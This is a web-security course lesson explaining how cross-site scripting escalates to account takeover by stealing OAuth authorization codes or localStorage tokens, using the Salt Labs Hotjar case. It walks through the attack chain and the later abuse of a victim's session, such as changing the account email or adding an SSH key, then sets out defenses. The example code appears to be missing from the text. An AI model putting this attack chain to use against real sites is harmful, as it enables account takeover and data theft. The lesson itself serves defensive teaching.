XSS Meets OAuth: From Script Injection to Account Takeover
The first three lessons covered XSS types, their payloads, and the vulnerabilities of frontend frameworks. Those focused on running JavaScript in a victim's browser. This lesson explains what happens next: account takeover.
This isn't about password attacks or phishing.
XSS can let an attacker log in as the victim in their own browser using a valid session.
OAuth, the protocol behind "Log in with Google," enables this risk.
Here's what we'll cover:
- How OAuth's authorization code flow works (just enough to see where XSS breaks it)
- Why HttpOnly cookies don't solve the problem
- Stealing tokens from localStorage (the simplest attack, and the one we saw in Lesson 1 with DeepSeek)
- The OAuth + XSS attack chain that Salt Labs used to take over accounts on Hotjar and Business Insider
- What the attacker can do in an authenticated session, even without stealing any token at all
- How to defend against XSS-to-account-takeover escalation
OAuth in 60 seconds (for frontend developers)
Most frontend developers have implemented "Log in with Google" or "Log in with GitHub" without looking too closely at what's happening under the hood. Here's the short version.
OAuth's authorization code flow involves four parties: the user, the client (the app), the authorization server (e.g., Google), and the resource server (e.g., user data).
The basic flow is:
- User clicks "Log in with Google".
- Our app redirects the user's browser to Google's authorization endpoint with our app's client ID, a redirect URL, and (in modern implementations) a PKCE code challenge.
- The user sees Google's login or consent screen. If they're already logged into Google, they might just see a brief consent prompt or nothing at all before being redirected back.
- Google redirects the user's browser back to our app's redirect URL with an authorization code in the URL query string:
https://our-app.com/callback?code=abc123&state=xyz - Our app's backend takes that authorization code (and the PKCE code verifier, if used) and exchanges it for an access token by calling Google's token endpoint directly (server-to-server, not through the browser).
- Our app uses the access token to call Google's API and get the user's profile information. The user is now logged in.
Step 4 is critical: the authorization code appears in the URL as the query string.
JavaScript running in a browser context for our domain can access this code directly using standard DOM APIs.
Normally, the app's JavaScript reads the code from the URL and sends it to the backend for processing.
But with XSS, an attacker's JavaScript can also read this code. PKCE doesn't stop this if the attacker's code runs on the same origin.
Why HttpOnly cookies were supposed to save us
Historically, a primary defense against XSS-facilitated session theft has been storing session tokens in cookies with the HttpOnly attribute.
When active, HttpOnly prevents any JavaScript, including XSS payloads, from reading or manipulating the cookie contents through document.cookie, though the browser will continue to send the cookie with each HTTP request.
This worked well in the era of server-rendered applications where the server managed the session, and the cookie was the only credential.
But SPAs changed the architecture.
In modern single-page applications (SPAs) that use OAuth, the access token returned must be accessible to frontend JavaScript for authenticating API requests, typically sent in the Authorization: Bearer <token> HTTP header.
As a result, the token must be stored in a location readable by the application code running in the browser.
Where does it go? Three common options:
localStorage is the most common choice because it's the simplest to implement. Most OAuth tutorials and client libraries default to it.
The token persists across tabs and page refreshes, keeping the user logged in. But any JavaScript on the page can read it, including malicious code such as XSS payloads.
sessionStorage stores tokens at the tab level and does not persist data across tabs. Like localStorage, any JavaScript in the page context can access its data.
With in-memory storage, tokens disappear on page refresh, forcing re-authentication.
Few apps use this due to poor UX. XSS can still steal the token by hooking app requests in JavaScript.
Philippe De Ryck says: With XSS, attackers control your app code and can extract tokens no matter where you store them.
Token location changes the difficulty, not the result.
Stealing tokens from localStorage
The simplest XSS escalation is direct token theft from localStorage:
If the app keeps tokens in localStorage, the attacker can steal them via XSS, set the Authorization header, and log in as the victim.
This is what the DeepSeek attack from Lesson 1 did. Johann Rehberger's XSS payload extracted the userToken from localStorage on chat.deepseek.com and fully compromised the account. One getItem call.
Don't store tokens in localStorage.
Use HttpOnly cookies or keep tokens in memory via a backend-for-frontend pattern.
Token storage is only part of the issue.
The OAuth + XSS attack: stealing authorization codes
Salt Labs demonstrated in July 2024 that XSS and OAuth can be combined to enable account takeover, even with HttpOnly cookies.
They demonstrated it on Hotjar and Business Insider.
The attack doesn't steal cookies. It steals the OAuth authorization code from the URL during a social login flow.
Here's how it works, step by step.
Step 1: Find an XSS vulnerability on the target site.
Salt Labs found a reflected XSS vulnerability in Hotjar's insights.hotjar.com endpoint. The returnURL parameter was reflected into the page without proper encoding, allowing a javascript: URI to execute:
The extraVar parameter was added to bypass Hotjar's WAF.
The URL looks completely legitimate to the victim because the domain is insights.hotjar.com.
Step 2: The XSS payload initiates a new OAuth login flow.
Instead of trying to read cookies (which are HttpOnly) or localStorage (which might be empty), the attacker's JavaScript opens a new window and starts a fresh OAuth login flow with Google.
Because the attacker's script is initiating the flow, it controls all the parameters, including the PKCE code verifier if PKCE is in use:
Note: the state parameter (used for CSRF protection) isn't included here.
Most OAuth providers don't require it on the authorization request.
The state check happens in the callback, and in this attack, the attacker doesn't need to pass it because they're reading the code directly from the URL rather than submitting the callback form.
Step 3: Google redirects back with the authorization code.
Because the user is already logged into Google (as most people are), Google skips the login screen and immediately redirects back to Hotjar with the authorization code in the URL:
Step 4: The XSS JavaScript reads the code from the new window.
The new window loads a page on the same origin, so once the OAuth redirect returns to insights.hotjar.com, the attacker's script can read the URL and extract the code. The script waits until this redirect completes.
Step 5: The attacker exchanges the code for a session.
The attacker now has a valid Google authorization code for the victim's Hotjar account. Since the attacker's script initiated the OAuth flow in Step 2, it also knows the PKCE code verifier (if one was used), because the script generated it.
The code is bound to the attacker's verifier, not the legitimate app's. The attacker sends the code and verifier to their server, which exchanges them for an access token and completes the login as the victim.
Step 6: Full account takeover.
The attacker now has full access to the victim's Hotjar account. Hotjar records user sessions, including keyboard and mouse activity. That data includes names, email addresses, private messages, bank details entered into forms, and, in some cases, credentials. The attacker can change account settings to expose even more data.
From the victim's perspective, they clicked a normal-looking link to insights.hotjar.com, the page loaded, a small pop-up appeared and closed within a second, and everything seemed fine.
Compare that to a phishing attack, which requires the victim to type their credentials into a fake page. This is far less visible.
Why this works: what OAuth doesn't protect
The Hotjar attack worked because of a fundamental assumption in OAuth's security model: the browser is a trusted environment. OAuth protects the token exchange with HTTPS and client secrets.
It protects against CSRF with the state parameter. PKCE prevents a network-level attacker from intercepting the authorization code in transit.
But none of that helps when the attacker's code is running inside the same browser, on the same origin, with the same privileges as the legitimate application.
The XSS payload, from the browser's perspective, is part of the application. It can do everything the application can do.
PKCE specifically fails here because it was designed to protect against a different threat: a malicious app on the same device intercepting the redirect.
When the attacker's XSS code initiates the OAuth flow, it generates its own PKCE verifier and receives the code bound to it. PKCE is intact.
It just doesn't matter because the attacker controls both sides.
The state parameter prevents CSRF (an attacker forcing the victim to complete an OAuth flow initiated by the attacker). It doesn't prevent the attacker from reading code from a flow the attacker triggered via XSS.
Beyond token theft: what XSS can do in an authenticated session
Stealing tokens and authorization codes gives the attacker persistent access in their own browser.
But even without exfiltrating any credentials, XSS in an authenticated session can do serious damage in real time.
When the attacker's JavaScript runs in the victim's browser, it runs with the victim's session. Every request it makes includes the victim's cookies automatically.
It can call any API the victim is authorized to use. And if those API endpoints require CSRF tokens, the attacker's script can read the token from the page first (it's typically in a <meta> tag or a hidden form field, both readable by JavaScript) and include it in the request.
Changing the user's email address:
Reading sensitive data from the page:
Adding an SSH key to a developer account:
The email change is particularly dangerous because it gives the attacker a persistent backdoor.
Even after the XSS is patched and the victim's current session expires, the attacker can use password reset on the new email to regain access.
These attacks work whether tokens are in localStorage, in memory, or in HttpOnly cookies.
They work with or without PKCE. XSS gives the attacker the same capabilities as the victim's browser session, and that's enough.
How to defend against XSS-to-account-takeover
The defenses form layers, and none of them is sufficient on its own.
The real fix is to prevent XSS.
Everything we covered in Lessons 1 through 3 (auto-encoding, sanitization with DOMPurify, the SafeHTML wrapper, URL validation, avoiding escape hatches) exists to prevent the attacker from getting JavaScript execution in the first place.
If they can't run code, the entire attack chain in this lesson is impossible.
For credential storage, every token that doesn't need to be accessed by JavaScript should be in an HttpOnly cookie.
This doesn't prevent the OAuth code theft or the authenticated-session attacks described above, but it blocks the simplest vector: reading tokens from localStorage.
The backend-for-frontend (BFF) pattern goes further. Instead of handling OAuth tokens in the browser, a thin backend server sits between the browser and the OAuth provider.
The browser talks to the BFF with an HttpOnly session cookie, and the BFF handles all OAuth operations server-side: initiating the flow, receiving the callback with the authorization code, exchanging the code for tokens, and attaching the access token to API requests.
The browser never sees the authorization code or the access token. This would have blocked the Salt Labs attack entirely because the authorization code redirect goes to the backend, not to a browser URL that JavaScript can read.
For authenticated-session attacks (email change, SSH key injection, data exfiltration), the most effective defense is to require re-authentication for sensitive operations.
If changing the account email or adding an SSH key requires the user to re-enter their password or complete a WebAuthn challenge, the XSS attacker can't complete those operations even with a valid session. This is specifically what blocks the email-change backdoor technique.
OAuth authorization codes should be single-use and expire quickly (typically within 60 seconds). Access tokens should have short lifetimes.
This limits the window for the attacker to use stolen credentials, though it doesn't help when the attacker's script exfiltrates the code instantly.
A strict Content Security Policy can prevent the attacker's XSS payload from executing in the first place, even if the injection vulnerability exists. We'll cover CSP configuration in detail in Lesson 6.
Finally, monitoring for anomalous OAuth flows (a single user's authorization code exchanged from two different IP addresses, or OAuth flows initiated at unusual frequencies) can catch attacks in progress.
Once XSS achieves code execution, every defense except prevention is damage control. Philippe De Ryck's conclusion from his analysis of token storage applies to this entire lesson: the focus should be on preventing the injection, and the layers exist for when prevention fails.
What's next
In the next lesson, we'll look at a completely different source of XSS: AI.
When LLMs generate code, render HTML, or respond to prompt injection, they can introduce XSS vulnerabilities that no developer wrote.
References
- Salt Labs, "Over 1 Million Websites Are at Risk of Sensitive Information Leakage: XSS is Dead, Long Live XSS" (Hotjar research, July 2024) https://salt.security/blog/over-1-million-websites-are-at-risk-of-sensitive-information-leakage---xss-is-dead-long-live-xss
- Salt Labs, "Lack of Token Verification Flaw in OAuth: Grammarly, Vidio, Bukalapak" (October 2023) https://salt.security/press-releases/salt-security-discovers-lack-of-token-verification-flaw-in-oauth-implementations-likely-impacting-1000s-of-websites-and-exposing-users-to-credential-leakage-and-account-takeover
- Dark Reading, "OAuth+XSS Attack Threatens Millions of Web Users With Account Takeover" (July 2024) https://www.darkreading.com/endpoint-security/oauth-xss-attack-millions-web-users-account-takeover
- SecurityWeek, "Millions of Websites Susceptible to XSS Attack via OAuth Implementation Flaw" (July 2024) https://www.securityweek.com/millions-of-websites-susceptible-xss-attack-via-oauth-implementation-flaw/
- Philippe De Ryck, "Why avoiding LocalStorage for tokens is the wrong solution" https://pragmaticwebsecurity.com/articles/oauthoidc/localstorage-xss.html
- PortSwigger, "OAuth 2.0 authentication vulnerabilities" https://portswigger.net/web-security/oauth
- Doyensec, "Common OAuth Vulnerabilities" (January 2025) https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html
- Auth0, "Authorization Code Flow" https://auth0.com/docs/get-started/authentication-and-authorization-flow/authorization-code-flow
- OWASP, "OAuth 2.0 Security Best Current Practice" https://cheatsheetseries.owasp.org/cheatsheets/OAuth2_Cheat_Sheet.html